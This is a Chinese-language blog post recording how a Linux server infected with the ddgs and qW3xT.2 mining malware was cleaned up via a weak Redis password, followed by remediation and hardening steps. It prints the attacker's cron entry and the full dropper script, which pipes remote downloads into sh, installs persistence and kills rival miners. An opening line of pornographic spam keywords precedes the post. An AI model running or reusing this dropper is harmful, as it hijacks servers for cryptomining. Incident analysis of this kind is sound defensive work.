欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

linux服務(wù)器被植入ddgs、qW3xT.2挖礦病毒的處理實(shí)戰(zhàn)記錄

 更新時(shí)間:2018年09月13日 11:42:15   作者:yuantc  
這篇文章主要給大家介紹了關(guān)于linux服務(wù)器被植入ddgs、qW3xT.2挖礦病毒的處理的相關(guān)資料,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起看看吧

前言

隨著虛擬貨幣的瘋狂炒作,挖礦病毒已經(jīng)成為不法分子利用最為頻繁的攻擊方式之一。病毒傳播者可以利用個(gè)人電腦或服務(wù)器進(jìn)行挖礦,具體現(xiàn)象為電腦CPU占用率高,C盤(pán)可使用空間驟降,電腦溫度升高,風(fēng)扇噪聲增大等問(wèn)題。

本文主要介紹的是關(guān)于linux植入ddgs、qW3xT.2挖礦病毒的處理方法,下面話不多說(shuō)了,來(lái)一起看看詳細(xì)的介紹吧

被入侵后的現(xiàn)象:

發(fā)現(xiàn)有qW3xT.2與ddgs兩個(gè)異常進(jìn)程,消耗了較高的cpu,kill掉后 過(guò)一會(huì)就會(huì)重新出現(xiàn)。

kill 掉這兩個(gè)異常進(jìn)程后,過(guò)一段時(shí)間看到了如下進(jìn)程:

首先在/etc/sysconfig/crotnab中的定時(shí)任務(wù)沒(méi)有找到定時(shí)腳本,輸入crontab -e 在其中找到了該定時(shí)任務(wù)

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
<span style="font-size: 15px;">查詢了下149.56.106.215在美國(guó),i.sh 腳本內(nèi)容如下:</span>
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
 wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
 curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

處理方法:

1.刪除  crontab -e 中

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

2.清除/root/.ssh/authorized_keys 中黑客設(shè)置的免密登錄內(nèi)容

3.修改redis密碼

4.修改root與登錄賬戶密碼

安全建議:

1.配置bind選項(xiàng),限定可以連接Redis服務(wù)器的IP,修改 Redis 的默認(rèn)端口6379 配置認(rèn)證,也就是AUTH,設(shè)置密碼,密碼會(huì)以明文方式保存在Redis配置文件中

2.配置rename-command 配置項(xiàng) “RENAME_CONFIG”,這樣即使存在未授權(quán)訪問(wèn),也能夠給攻擊者使用config 指令加大難度

3.如果可以在防火墻中屏蔽redis外網(wǎng)      

入侵方式:

收集了相關(guān)資料,了解到其是利用redis漏洞,未設(shè)置密碼或密碼太簡(jiǎn)單,導(dǎo)致的被入侵。具體方式可以參考

http://www.dbjr.com.cn/article/147375.htm

reids修改密碼方法如下:

redis-cli -h 127.0.0.1 -p 6379
config get requirepass ##獲取當(dāng)前密碼
config set requirepass "yourpassword" ##設(shè)置當(dāng)前密碼,服務(wù)重新啟動(dòng)后又會(huì)置為默認(rèn),即無(wú)密碼;

永久生效方法為,打開(kāi)redis配置文件redis.conf,找到requirepass值修改密碼,如下:

requirepass yourpassword ##此處注意,行前不能有空格

總結(jié)

以上就是這篇文章的全部?jī)?nèi)容了,希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,如果有疑問(wèn)大家可以留言交流,謝謝大家對(duì)腳本之家的支持。

相關(guān)文章

  • Ubuntu 16.04源碼編譯安裝Apache 2.4.25教程

    Ubuntu 16.04源碼編譯安裝Apache 2.4.25教程

    這篇文章主要為大家詳細(xì)介紹了Ubuntu 16.04源碼編譯安裝Apache 2.4.25,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下
    2017-01-01
  • 詳解在linxu下Svn一鍵安裝shell腳本

    詳解在linxu下Svn一鍵安裝shell腳本

    這篇文章主要介紹了在linxu下Svn一鍵安裝shell腳本的方法,本文給大家介紹的非常詳細(xì),具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2020-02-02
  • 在Linux中配置IPv4和IPv6地址的方法詳解

    在Linux中配置IPv4和IPv6地址的方法詳解

    IPv4和IPv6是Internet上常用的兩種IP地址協(xié)議,在Linux系統(tǒng)中,您可以通過(guò)配置網(wǎng)絡(luò)接口來(lái)設(shè)置IPv4和IPv6地址,本文將詳細(xì)介紹如何在Linux中配置IPv4和IPv6地址,需要的朋友可以參考下
    2024-09-09
  • Ubuntu下VIM配置成C++開(kāi)發(fā)編輯器

    Ubuntu下VIM配置成C++開(kāi)發(fā)編輯器

    今天小編就為大家分享一篇關(guān)于Ubuntu下VIM配置成C++開(kāi)發(fā)編輯器,小編覺(jué)得內(nèi)容挺不錯(cuò)的,現(xiàn)在分享給大家,具有很好的參考價(jià)值,需要的朋友一起跟隨小編來(lái)看看吧
    2018-10-10
  • centos7.x 部署主、從DNS服務(wù)器問(wèn)題

    centos7.x 部署主、從DNS服務(wù)器問(wèn)題

    這篇文章主要介紹了centos7.x 部署主、從DNS服務(wù)器問(wèn)題,本文給大家介紹的非常詳細(xì),具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2019-10-10
  • Apache中Virtual Host虛擬主機(jī)配置及rewrite參數(shù)說(shuō)明

    Apache中Virtual Host虛擬主機(jī)配置及rewrite參數(shù)說(shuō)明

    這篇文章主要介紹了Apache中Virtual Host虛擬主機(jī)配置及rewrite模塊中的重要參數(shù)說(shuō)明,是在同一個(gè)Apache服務(wù)器軟件上部署多個(gè)站點(diǎn)的基礎(chǔ)方法,需要的朋友可以參考下
    2016-03-03
  • YUM軟件包管理工具與yum命令的詳細(xì)介紹

    YUM軟件包管理工具與yum命令的詳細(xì)介紹

    yum是基于RPM包管理器、為了提高RPM軟件包安裝性而開(kāi)發(fā)的一種軟件包管理器。它能夠從指定的服務(wù)器自動(dòng)下載.rpm包并自動(dòng)安裝,可以自動(dòng)處理依賴性關(guān)系,并一次性安裝所有依賴的軟體包。本文就詳細(xì)介紹了YUM軟件包管理工具與yum命令。有需要的朋友們下面來(lái)一起看看吧。
    2017-01-01
  • Linux輸入子系統(tǒng)框架原理解析

    Linux輸入子系統(tǒng)框架原理解析

    這篇文章主要介紹了Linux輸入子系統(tǒng)框架原理解析,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友可以參考下
    2020-09-09
  • 無(wú)法啟動(dòng)Apache的問(wèn)題解決方法

    無(wú)法啟動(dòng)Apache的問(wèn)題解決方法

    這篇文章主要介紹了無(wú)法啟動(dòng)Apache的問(wèn)題解決方法,需要的朋友可以參考下
    2014-05-05
  • 在CentOS7上搭建Jenkins+Maven+Git持續(xù)集成環(huán)境的方法

    在CentOS7上搭建Jenkins+Maven+Git持續(xù)集成環(huán)境的方法

    這篇文章主要介紹了在CentOS7上搭建Jenkins+Maven+Git持續(xù)集成環(huán)境的方法,小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧
    2019-01-01

最新評(píng)論